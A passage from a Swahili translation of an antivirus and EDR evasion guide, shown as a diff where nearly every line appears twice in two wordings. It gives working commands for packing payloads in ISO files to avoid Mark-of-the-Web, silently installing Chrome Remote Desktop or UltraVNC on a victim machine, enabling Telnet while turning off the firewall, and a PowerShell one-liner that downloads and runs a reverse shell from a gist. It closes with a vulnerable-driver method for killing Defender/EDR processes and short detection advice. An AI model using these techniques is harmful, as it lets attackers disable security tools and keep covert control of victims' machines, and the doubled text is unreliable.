Mnyororo hapo juu unarejesha execution flow **without** haja ya kuendesha sampuli yenye madhara yenye msaada wakati unafanya kazi kwenye workstation isiyounganishwa.
The above chain restores execution flow **without** needing to run the malicious sample useful when working on an offline workstation.
> 🛈 ConfuserEx hutengeneza attribute maalum inayoitwa `ConfusedByAttribute` ambayo inaweza kutumika kama IOC ku-triage samples moja kwa moja.
> 🛈 ConfuserEx huunda attribute maalum iitwayo `ConfusedByAttribute` ambayo inaweza kutumiwa kama IOC kuotomatisha kuainisha sampuli.
#### One-liner
```bash
@ -325,40 +326,40 @@ autotok.sh Confused.exe # wrapper that performs the 3 steps above sequentially
```
---
- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: Obfuscator ya C#**
- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): Lengo la mradi huu ni kutoa fork ya open-source ya [LLVM](http://www.llvm.org/) compilation suite inayoweza kutoa ulinzi zaidi wa programu kupitia [code obfuscation](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) na tamper-proofing.
- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator inaonyesha jinsi ya kutumia lugha ya `C++11/14` kuunda, wakati wa kucompile, obfuscated code bila kutumia zana za nje na bila kubadilisha compiler.
- [**obfy**](https://github.com/fritzone/obfy): Inongeza tabaka la obfuscated operations zinazozalishwa na C++ template metaprogramming framework ambayo itafanya maisha ya mtu anayejaribu kuvunja application kuwa ngumu kidogo.
- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz ni x64 binary obfuscator inayoweza kuficha aina mbalimbali za pe files ikiwa ni pamoja na: .exe, .dll, .sys
- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# obfuscator**
- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): Lengo la mradi huu ni kutoa fork ya chanzo wazi ya suite ya uundaji wa [LLVM] inayoweza kuongeza usalama wa programu kupitia [code obfuscation] na tamper-proofing.
- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator inaonyesha jinsi ya kutumia lugha ya `C++11/14` kuzalisha, wakati wa compile, obfuscated code bila kutumia zana za nje na bila kubadilisha compiler.
- [**obfy**](https://github.com/fritzone/obfy): Inaongeza safu ya obfuscated operations zinazotengenezwa na C++ template metaprogramming framework ambazo zitamfanya mtu anayetaka crack application kuwa na kazi ngumu kidogo.
- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz ni x64 binary obfuscator inayoweza ku-obfuscate aina mbalimbali za PE files ikiwa ni pamoja na: .exe, .dll, .sys
- [**metame**](https://github.com/a0rtega/metame): Metame ni engine rahisi ya metamorphic code kwa executables yoyote.
- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator ni fine-grained code obfuscation framework kwa LLVM-supported languages ikitumia ROP (return-oriented programming). ROPfuscator inaficha programu kwenye assembly code level kwa kubadilisha instructions za kawaida kuwa ROP chains, ikizuia mtazamo wetu wa kawaida wa control flow.
- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator ni fine-grained code obfuscation framework kwa lugha zinazotambulika na LLVM zinazotumia ROP (return-oriented programming). ROPfuscator inaobfuscate programu kwenye assembly code level kwa kubadilisha maagizo ya kawaida kuwa ROP chains, ikizuia mtazamo wetu wa kawaida wa control flow.
- [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt ni .NET PE Crypter imeandikwa kwa Nim
- [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor inaweza kubadilisha EXE/DLL zilizopo kuwa shellcode kisha kuzipakia
## SmartScreen & MoTW
Labda umeona skrini hii unapopakua baadhi ya executables kutoka kwenye intaneti na kuziendesha.
Huenda umewahi kuona skrini hii unapopakua baadhi ya executables kutoka mtandao na kuzitekeleza.
Microsoft Defender SmartScreen ni mekanismo ya usalama iliyolengwa kumlinda mtumiaji wa mwisho dhidi ya kuendesha applications ambazo zinaweza kuwa za hatari.
Microsoft Defender SmartScreen ni utaratibu wa usalama uliokusudiwa kumlinda mtumiaji wa mwisho dhidi ya kuendesha applications ambazo zinaweza kuwa hatarishi.
<figure><img src="../images/image (664).png" alt=""><figcaption></figcaption></figure>
SmartScreen inafanya kazi kwa mtazamo wa msingi wa sifa (reputation-based approach), ikimaanisha kwamba applications zisizopakuliwa mara kwa mara zitatia off SmartScreen na kuonya na kuzuia mtumiaji wa mwisho kuendesha faili (hata hivyo faili bado zinaweza kuendeshwa kwa kubofya More Info -> Run anyway).
SmartScreen huvumilia hasa kwa njia ya msingi wa sifa (reputation-based), ikimaanisha kwamba applications ambazo hazipakwi mara kwa mara zitatikisa SmartScreen, hivyo kuwatangazia na kuzuia mtumiaji kuendesha faili (hata hivyo faili bado inaweza kuendeshwa kwa kubofya More Info -> Run anyway).
**MoTW** (Mark of The Web) ni [NTFS Alternate Data Stream](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>) yenye jina Zone.Identifier ambayo huundwa moja kwa moja unapopakua faili kutoka mtandaoni, pamoja na URL kutoka ambako ilipakuliwa.
**MoTW** (Mark of The Web) ni [NTFS Alternate Data Stream](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>) yenye jina Zone.Identifier ambayo huundwa moja kwa moja unapo pakua faili kutoka mtandao, pamoja na URL iliyotumika kupakua.
<figure><img src="../images/image (237).png" alt=""><figcaption><p>Kukagua Zone.Identifier ADS kwa faili iliyopakuliwa kutoka mtandaoni.</p></figcaption></figure>
<figure><img src="../images/image (237).png" alt=""><figcaption><p>Kukagua Zone.Identifier ADS kwa faili iliyopakuliwa kutoka mtandao.</p></figcaption></figure>
> [!TIP]
> Ni muhimu kutambua kwamba executables zilizotiwa saini kwa cheti cha kusaini kinachothibitishwa (**trusted**) **hazitowashi SmartScreen**.
> Ni muhimu kutambua kwamba executables zilizotiwa saini na **trusted** signing certificate **hazitatikisi SmartScreen**.
Njia yenye ufanisi sana ya kuzuia payloads zako kupata Mark of The Web ni kuzifunga ndani ya container kama ISO. Hii hutokea kwa sababu Mark-of-the-Web (MOTW) **cannot** kutumika kwenye volumes **non NTFS**.
Njia yenye ufanisi mkubwa kuzuia payloads zako kupata Mark of The Web ni kuziweka ndani ya container kama ISO. Hii inatokea kwa sababu Mark-of-the-Web (MOTW) **haiwezi** kutumika kwenye volumes zisizo za NTFS.
<figure><img src="../images/image (640).png" alt=""><figcaption></figcaption></figure>
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) ni zana inayofunga payloads kwenye output containers ili kuepuka Mark-of-the-Web.
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) ni chombo kinachofunga payloads ndani ya output containers ili kuepuka Mark-of-the-Web.
Mfano wa utumiaji:
Example usage:
```bash
PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
@ -380,57 +381,57 @@ Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
```
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
Hapa kuna demo ya kuvuka SmartScreen kwa kufunga payloads ndani ya faili za ISO kwa kutumia [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
<figure><img src="../images/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
## ETW
Event Tracing for Windows (ETW) ni mfumo wenye nguvu wa kurekodi matukio kwenye Windows unaowawezesha programu na vipengele vya mfumo **kurekodi matukio**. Hata hivyo, pia inaweza kutumiwa na bidhaa za usalama kuangalia na kugundua shughuli zenye madhara.
Event Tracing for Windows (ETW) ni mekanisma yenye nguvu ya logging katika Windows inayoruhusu programu na vipengele vya mfumo **kuandika matukio**. Hata hivyo, pia inaweza kutumika na bidhaa za usalama kufuatilia na kugundua shughuli hatarishi.
Vivyo hivyo jinsi AMSI inavyozimwa (bypassed) inawezekana pia kufanya yafunction ya user space `EtwEventWrite` irudie mara moja bila kurekodi matukio yoyote. Hii hufanyika kwa kupatch function hiyo katika memory ili irudie mara moja, hivyo kwa ufanisi kuzima kurekodi kwa ETW kwa mchakato huo.
Vivyo hivyo jinsi AMSI inavyokatizwa (kuepukwa), pia inawezekana kufanya funksioni ya user space `EtwEventWrite` irudie mara moja bila kuandika matukio yoyote. Hii hufanywa kwa kupachika (patch) funksioni hiyo katika memory ili irudie mara moja, kwa ufanisi kuzima logging ya ETW kwa mchakato huo.
Unaweza kupata taarifa zaidi katika **[https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/) and [https://github.com/repnz/etw-providers-docs/](https://github.com/repnz/etw-providers-docs/)**.
Unaweza kupata maelezo zaidi katika **[https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/) and [https://github.com/repnz/etw-providers-docs/](https://github.com/repnz/etw-providers-docs/)**.
## C# Assembly Reflection
Kupakia binaries za C# kwenye memory imejulikana kwa muda mrefu na bado ni njia nzuri ya kuendesha zana zako za post-exploitation bila kugunduliwa na AV.
Kupakia binaries za C# ndani ya memory imekuwa ikitumiwa kwa muda na bado ni njia nzuri ya kuendesha post-exploitation tools bila kugunduliwa na AV.
Kwa kuwa payload itawekwa moja kwa moja kwenye memory bila kugusa disk, tutalazimika tu kushughulikia patch ya AMSI kwa mchakato mzima.
Kwa kuwa payload itapakiwa moja kwa moja kwenye memory bila kugusa disk, tutalazimika tu kuzingatia kupatch AMSI kwa mchakato mzima.
Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) tayari hutoa uwezo wa kuendesha C# assemblies moja kwa moja kwenye memory, lakini kuna njia tofauti za kufanya hivyo:
Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) tayari zina uwezo wa kutekeleza C# assemblies moja kwa moja kwenye memory, lakini kuna njia tofauti za kufanya hivyo:
- **Fork\&Run**
Inahusisha **kuumba mchakato mpya wa kujitoa** (sacrificial process), ku-inject code yako ya post-exploitation ndani ya mchakato huo mpya, kuendesha code yako ya uharibifu na ukimaliza, kuua mchakato mpya. Hii ina faida zake na hasara zake. Faida ya njia ya fork and run ni kwamba utekelezaji unafanyika **nje** ya mchakato wetu wa Beacon implant. Hii ina maana kwamba kama kitu kimeenda vibaya au kimegunduliwa katika kitendo chetu cha post-exploitation, kuna **uwezekano mkubwa** wa **implant yetu kuendelea kuishi.** Hasara ni kwamba una **uwezekano mkubwa** wa kugunduliwa na **Behavioural Detections**.
Inahusisha **kuanzisha mchakato mpya wa kujitoa (sacrificial process)**, kuingiza post-exploitation malicious code yako ndani ya mchakato huo mpya, kutekeleza code yako ya uharibifu na baada ya kumaliza, kuua mchakato huo mpya. Hii ina faida na hasara zake. Faida ya njia ya fork and run ni kwamba utekelezaji unafanyika **nje** ya mchakato wetu wa Beacon implant. Hii inamaanisha kwamba ikiwa kitu katika hatua yetu ya post-exploitation kitaenda vibaya au kitakamatwa, kuna **uwezekano mkubwa zaidi** wa **implant kuishi.** Hasara ni kwamba una **uwezekano mkubwa zaidi** wa kugunduliwa na **Behavioural Detections**.
<figure><img src="../images/image (215).png" alt=""><figcaption></figcaption></figure>
- **Inline**
Inahusu ku-inject code ya post-exploitation ya uharibifu **ndani ya mchakato wake mwenyewe**. Kwa njia hii, unaweza kuepuka kuunda mchakato mpya na kukiwekwa chini ya skana ya AV, lakini hasara ni kwamba kama kitu kitatokea vibaya kwa utekelezaji wa payload yako, kuna **uwezekano mkubwa** wa **kupoteza beacon yako** kwani inaweza kufunguka (crash).
Inahusu kuingiza post-exploitation malicious code **katika mchakato wake mwenyewe**. Kwa njia hii, unaweza kuepuka kuunda mchakato mpya na kukipimwa na AV, lakini hasara ni kwamba ikiwa kitu kitaenda vibaya kwa utekelezaji wa payload yako, kuna **uwezekano mkubwa zaidi** wa **kupoteza beacon** kwani inaweza kushindwa (crash).
<figure><img src="../images/image (1136).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Ikiwa unataka kusoma zaidi kuhusu C# Assembly loading, tafadhali angalia makala hii [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) na InlineExecute-Assembly BOF yao ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
> Ikiwa ungependa kusoma zaidi kuhusu kupakia C# Assembly, tafadhali angalia makala hii [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) na BOF yao InlineExecute-Assembly ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
Unaweza pia kupakia C# Assemblies **kutoka PowerShell**, angalia [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) na [S3cur3th1sSh1t's video](https://www.youtube.com/watch?v=oe11Q-3Akuk).
## Using Other Programming Languages
Kama ilivyopendekezwa katika [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), inawezekana kuendesha code ya uharibifu kwa kutumia lugha nyingine kwa kumruhusu mashine iliyodhulumiwa kupata **interpreter environment iliyowekwa kwenye Attacker Controlled SMB share**.
Kama ilivyopendekezwa katika [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), inawezekana kutekeleza malicious code kwa kutumia lugha nyingine kwa kumruhusu mashine iliyoharibika kupata mazingira ya interpreter iliyowekwa kwenye Attacker Controlled SMB share.
Kwa kuruhusu upatikanaji wa Interpreter Binaries na environment kwenye SMB share unaweza **kuendesha code yoyote katika lugha hizi ndani ya memory** ya mashine iliyodhulumiwa.
Kwa kuruhusu ufikiaji wa Interpreter Binaries na mazingira kwenye SMB share unaweza **execute arbitrary code in these languages within memory** ya mashine iliyoharibika.
Repo inasema: Defender bado inaskana scripts lakini kwa kutumia Go, Java, PHP n.k tuna **uwezo zaidi wa kupitisha signatures za static**. Majaribio kwa kutumia random un-obfuscated reverse shell scripts katika lugha hizi yamefanikiwa.
Repo inaonyesha: Defender bado inapima scripts lakini kwa kutumia Go, Java, PHP n.k. tunapata **more flexibility to bypass static signatures**. Ujaribu na random un-obfuscated reverse shell scripts katika lugha hizi umeonyesha mafanikio.
## TokenStomping
Token stomping ni mbinu inayomruhusu mshambuliaji **kudanganya access token au bidhaa ya usalama kama EDR au AV**, kumruhusu kupunguza haki zake ili mchakato usife lakini usiwe na ruhusa za kukagua shughuli zenye madhara.
Token stomping ni mbinu inayoruhusu mshambuliaji **kuingilia access token au bidhaa ya usalama kama EDR au AV**, ikimruhusu kupunguza ruhusa zake ili mchakato usife lakini usiwe na ruhusa za kukagua shughuli hatarishi.
Kuzuia hili Windows inaweza **kuzuia mchakato wa nje** kupata handles juu ya tokens za mchakato za usalama.
Ili kuzuia hili Windows inaweza **kuzuia michakato ya nje** kupata handles juu ya tokeni za michakato ya usalama.
- [**https://github.com/pwn1sher/KillDefender/**](https://github.com/pwn1sher/KillDefender/)
- [**https://github.com/MartinIngesen/TokenStomp**](https://github.com/MartinIngesen/TokenStomp)
@ -440,79 +441,80 @@ Kuzuia hili Windows inaweza **kuzuia mchakato wa nje** kupata handles juu ya tok
### Chrome Remote Desktop
Kama ilivyoelezwa katika [**this blog post**](https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide), ni rahisi tu kufunga Chrome Remote Desktop kwenye PC ya mwathiri na kisha kuitumia kumchukua na kudumisha persistence:
1. Download kutoka https://remotedesktop.google.com/, bonyeza "Set up via SSH", kisha bonyeza faili la MSI kwa Windows kupakua MSI file.
2. Endesha installer kimya kwenye mashine ya mwathiri (inahitaji admin): `msiexec /i chromeremotedesktophost.msi /qn`
3. Rudi kwenye ukurasa wa Chrome Remote Desktop na bonyeza next. Wizard kisha itakuuliza ku-authorize; bonyeza kitufe cha Authorize ili kuendelea.
4. Endesha parameter iliyotolewa kwa mabadiliko machache: `"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111` (Kumbuka param ya pin ambayo inaruhusu kuweka pin bila kutumia GUI).
Kama ilivyoelezwa katika [**this blog post**](https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide), ni rahisi tu kusanisha Chrome Remote Desktop kwenye PC ya mwathirika na kisha kuitumia kumimiliki na kudumisha persistence:
1. Download kutoka https://remotedesktop.google.com/, bonyeza "Set up via SSH", kisha bonyeza faili la MSI kwa Windows ili kupakua faili ya MSI.
2. Endesha installer kwa kimya kwenye mashine ya mwathirika (inahitaji admin): `msiexec /i chromeremotedesktophost.msi /qn`
3. Rudi kwenye ukurasa wa Chrome Remote Desktop na bonyeza next. Wizard itakuuliza uidhinishe; bonyeza kitufe cha Authorize ili kuendelea.
4. Endesha parameter iliyotolewa kwa marekebisho machache: `"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111` (Kumbuka param ya pin inayoruhusu kuweka pin bila kutumia GUI).
## Advanced Evasion
Evasion ni mada ngumu sana, mara nyingi unalazimika kuzingatia vyanzo vingi vya telemetry katika mfumo mmoja tu, kwa hivyo ni karibu haiwezekani kubaki bila kugunduliwa kabisa katika mazingira yenye umri/uttekelezaji wa juu.
Evasion ni mada ngumu sana, wakati mwingine unalazimika kuzingatia vyanzo vingi vya telemetry ndani ya mfumo mmoja, hivyo ni vigumu kabisa kubaki bila kugunduliwa katika mazingira yaliyojaa teknolojia.
Kila mazingira unayowahi kukabiliana nayo yata kuwa na nguvu na udhaifu wake mwenyewe.
Kila mazingira unayokabiliana nayo itakuwa na nguvu na udhaifu wake.
Ninakuhimiza sana utaangalie hotuba hii kutoka kwa [@ATTL4S](https://twitter.com/DaniLJ94), ili kupata ufahamu wa mbinu za Advanced Evasion.
Ninakupongeza uangalie hotuba hii kutoka kwa [@ATTL4S](https://twitter.com/DaniLJ94), ili kupata mtazamo wa mbinu za Advanced Evasion.
{{#ref}}
https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo
{{#endref}}
Hii pia ni hotuba nyingine nzuri kutoka kwa [@mariuszbit](https://twitter.com/mariuszbit) kuhusu Evasion in Depth.
Hii pia ni hotuba nzuri kutoka kwa [@mariuszbit](https://twitter.com/mariuszbit) kuhusu Evasion in Depth.
{{#ref}}
https://www.youtube.com/watch?v=IbA7Ung39o4
{{#endref}}
## **Old Techniques**
## **Mbinu za Kale**
### **Check which parts Defender finds as malicious**
### **Angalia ni sehemu gani Defender inaona kuwa hatarishi**
Unaweza kutumia [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) ambayo itatoa sehemu za binary moja baada ya nyingine mpaka itagundua ni sehemu gani Defender inaiona kuwa zenye uhalifu na kuigawanya kwako.\
Zana nyingine inayofanya kitu kama hicho ni [**avred**](https://github.com/dobin/avred) yenye huduma ya wavuti katika [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
Unaweza kutumia [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) ambayo itatoa sehemu za binary mpaka itagundua ni sehemu gani Defender inaiona kuwa hatarishi na itakuonyesha.\
Chombo kingine kinachofanya jambo **sawa** ni [**avred**](https://github.com/dobin/avred) na huduma ya wavuti inapatikana kwenye [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
### **Telnet Server**
Mpaka Windows10, Windows zote zilikuja na **Telnet server** ambayo unaweza kuiweka (kama administrator) kwa kufanya:
Hadi Windows10, Windows zote ziliokuja na **Telnet server** ambayo unaweza kusanisha (kama administrator) ukifanya:
```bash
pkgmgr /iu:"TelnetServer" /quiet
```
Fanya **ianze** wakati mfumo unapowashwa na **iendeshe** sasa:
Fanya **ianze** wakati mfumo unapoanza na **endesha** sasa:
```bash
sc config TlntSVR start= auto obj= localsystem
```
**Badilisha telnet port** (stealth) na zimisha firewall:
**Badilisha telnet port** (stealth) na zima firewall:
```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```
### UltraVNC
Download it from: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (unataka downloads za bin, sio setup)
Pakua kutoka: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (unataka downloads za bin, si setup)
**ON THE HOST**: Endesha _**winvnc.exe**_ na sanidi server:
**KWENYE HOST**: Endesha _**winvnc.exe**_ na sanidi server:
- Washa chaguo _Disable TrayIcon_
- Weka nenosiri katika _VNC Password_
- Weka nenosiri katika _View-Only Password_
- Weka nywila katika _VNC Password_
- Weka nywila katika _View-Only Password_
Kisha, hamisha binary _**winvnc.exe**_ na faili **mpya** iliyoundwa _**UltraVNC.ini**_ ndani ya **victim**
#### **Reverse connection**
The **attacker** anapaswa **endesha ndani** ya **host** yake binary `vncviewer.exe -listen 5900` ili itakuwa **tayari** kukamata reverse **VNC connection**. Kisha, ndani ya **victim**: Anza daemon ya winvnc `winvnc.exe -run` na endesha `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**attacker** anapaswa kukimbisha kwenye **host** yake binary `vncviewer.exe -listen 5900` ili iwe tayari kushika reverse **VNC connection**. Kisha, ndani ya **victim**: Anzisha daemon ya winvnc `winvnc.exe -run` na endesha `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**ONYO:** Ili kudumisha stealth lazima usifanye mambo kadhaa
**ONYO:** Ili kubaki bila kuonekana usifanye mambo kadhaa
- Usianzishe `winvnc` ikiwa tayari inafanya kazi au utasababisha [popup](https://i.imgur.com/1SROTTl.png). angalia ikiwa inaendesha na `tasklist | findstr winvnc`
- Usianzishe `winvnc` bila `UltraVNC.ini` katika directory hiyo hiyo au itasababisha [the config window](https://i.imgur.com/rfMQWcf.png) kufunguka
- Usitumie `winvnc -h` kwa help au utasababisha [popup](https://i.imgur.com/oc18wcu.png)
- Usianze `winvnc` ikiwa tayari inaendesha au utaanzisha [popup](https://i.imgur.com/1SROTTl.png). Angalia ikiwa inaendesha kwa `tasklist | findstr winvnc`
- Usianze `winvnc` bila `UltraVNC.ini` kuwa katika saraka hiyo hiyo au itasababisha [dirisha la config](https://i.imgur.com/rfMQWcf.png) kufunguka
- Usiruhusu `winvnc -h` kwa msaada au utaanzisha [popup](https://i.imgur.com/oc18wcu.png)
### GreatSCT
Download it from: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
Pakua kutoka: [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
```
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
@ -530,19 +532,19 @@ sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```
Sasa **anza lister** kwa `msfconsole -r file.rc` na **endesha** **xml payload** kwa:
Sasa **anza lister** kwa kutumia `msfconsole -r file.rc` na **endesha** **xml payload** kwa kutumia:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```
**Mlinzi wa sasa atakata mchakato kwa haraka sana.**
**Defender wa sasa atasitisha mchakato haraka sana.**
### Kuunda reverse shell yetu mwenyewe
### Kujenga reverse shell yetu
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
#### C# Revershell ya kwanza
#### C# Revershell ya Kwanza
Ikompili kwa:
Jenga kwa:
```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```
@ -623,7 +625,7 @@ catch (Exception err) { }
}
}
```
### C# using mkusanyaji
### Kutumia compiler katika C#
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
@ -631,7 +633,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe RE
[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
Kupakua na kutekeleza kiotomatiki:
Kupakua na kutekeleza moja kwa moja:
```csharp
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
@ -658,7 +660,7 @@ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sec
- [http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html](http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html)
- [http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/](http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
### Kutumia python kwa mfano wa kujenga injectors:
### Kutumia python kwa mfano wa build injectors:
- [https://github.com/cocomelonc/peekaboo](https://github.com/cocomelonc/peekaboo)
@ -687,28 +689,28 @@ https://github.com/TheWover/donut
# Vulcan
https://github.com/praetorian-code/vulcan
```
### Zaidi
### More
- [https://github.com/Seabreg/Xeexe-TopAntivirusEvasion](https://github.com/Seabreg/Xeexe-TopAntivirusEvasion)
## Bring Your Own Vulnerable Driver (BYOVD) Kuondoa AV/EDR kutoka Kernel Space
## Bring Your Own Vulnerable Driver (BYOVD) Kuua AV/EDR kutoka Kernel Space
Storm-2603 ilitumia utility ndogo ya console inayojulikana kama **Antivirus Terminator** kuzima ulinzi wa endpoint kabla ya kuachia ransomware. Zana hiyo inaleta **driver yake dhaifu lakini *signed*** na kuitumia vibaya kutoa operesheni za kernel zenye vibali ambazo hata huduma za AV za Protected-Process-Light (PPL) hazina uwezo wa kuzizuia.
Storm-2603 ilitumia kifupi cha console kinachojulikana kama **Antivirus Terminator** kuzima ulinzi wa endpoint kabla ya kuangusha ransomware. Zana hiyo inaleta **driver yake mwenye udhaifu lakini *imesainiwa*** na kuutumia kutekeleza operesheni za kernel zenye vipaumbele ambazo hata huduma za AV za Protected-Process-Light (PPL) haziwezi kuzizuia.
Mambo muhimu kuchukuliwa
1. **Signed driver**: Faili iliyowekwa kwenye disk ni `ServiceMouse.sys`, lakini binary ni driver halali aliyesainiwa `AToolsKrnl64.sys` kutoka Antiy Labs “System In-Depth Analysis Toolkit”. Kwa sababu driver ina saini halali ya Microsoft, inaapakuliwa hata wakati Driver-Signature-Enforcement (DSE) imewezeshwa.
Mambo muhimu
1. **Signed driver**: Faili lililowekwa kwenye diski ni `ServiceMouse.sys`, lakini binary ni driver iliyo saini kwa uhalali `AToolsKrnl64.sys` kutoka Antiy Labs “System In-Depth Analysis Toolkit”. Kwa sababu driver ina saini halali ya Microsoft, inaloweshwa hata wakati Driver-Signature-Enforcement (DSE) imewezeshwa.
2. **Service installation**:
```powershell
sc create ServiceMouse type= kernel binPath= "C:\Windows\System32\drivers\ServiceMouse.sys"
sc start ServiceMouse
```
Mstari wa kwanza unasajili driver kama **kernel service** na wa pili unaianzisha ili `\\.\ServiceMouse` iweze kupatikana kutoka user land.
Mstari wa kwanza unasajili driver kama **kernel service** na wa pili unaiendesha ili `\\.\ServiceMouse` iweze kupatikana kutoka user land.
3. **IOCTLs exposed by the driver**
| IOCTL code | Uwezo |
|-----------:|------------------------------------|
| `0x99000050` | Kuua mchakato wowote kwa PID (kutumika kuua huduma za Defender/EDR) |
| `0x990000D0` | Kufuta faili yoyote kwenye disk |
| `0x990001D0` | Kuondoa driver na kuondoa service |
| `0x99000050` | Terminate an arbitrary process by PID (inatumika kuua huduma za Defender/EDR) |
| `0x990000D0` | Delete an arbitrary file on disk |
| `0x990001D0` | Unload the driver and remove the service |
Minimal C proof-of-concept:
```c
@ -722,28 +724,28 @@ CloseHandle(hDrv);
return 0;
}
```
4. **Why it works**: BYOVD hupita kabisa ulinzi wa user-mode; msimbo unaotekelezwa kwenye kernel unaweza kufungua mchakato *protected*, kuwaua, au kufanyia vitu vya kernel uharibifu bila kuzingatia PPL/PP, ELAM au vipengele vingine vya hardening.
4. **Why it works**: BYOVD inakwepa kabisa ulinzi wa user-mode; code inayotekelezwa kwenye kernel inaweza kufungua michakato *ilizoangaziwa*, kuimaliza (terminate), au kughushi vitu vya kernel bila kujali PPL/PP, ELAM au vipengele vingine vya kuimarisha.
Detection / Mitigation
• Wezesha orodha ya kuziba madriver dhaifu ya Microsoft (`HVCI`, `Smart App Control`) ili Windows ikatae kuipakia `AToolsKrnl64.sys`.
Fuatilia uundaji wa *kernel* services mpya na toa tahadhari wakati driver inapakiwa kutoka kwenye directory inayoweza kuandikwa na kila mtu au haipo kwenye allow-list.
Tazama handles za user-mode kwa custom device objects ikifuatiwa na simu za kushukiwa za `DeviceIoControl`.
Utambuzi / Kupunguza hatari
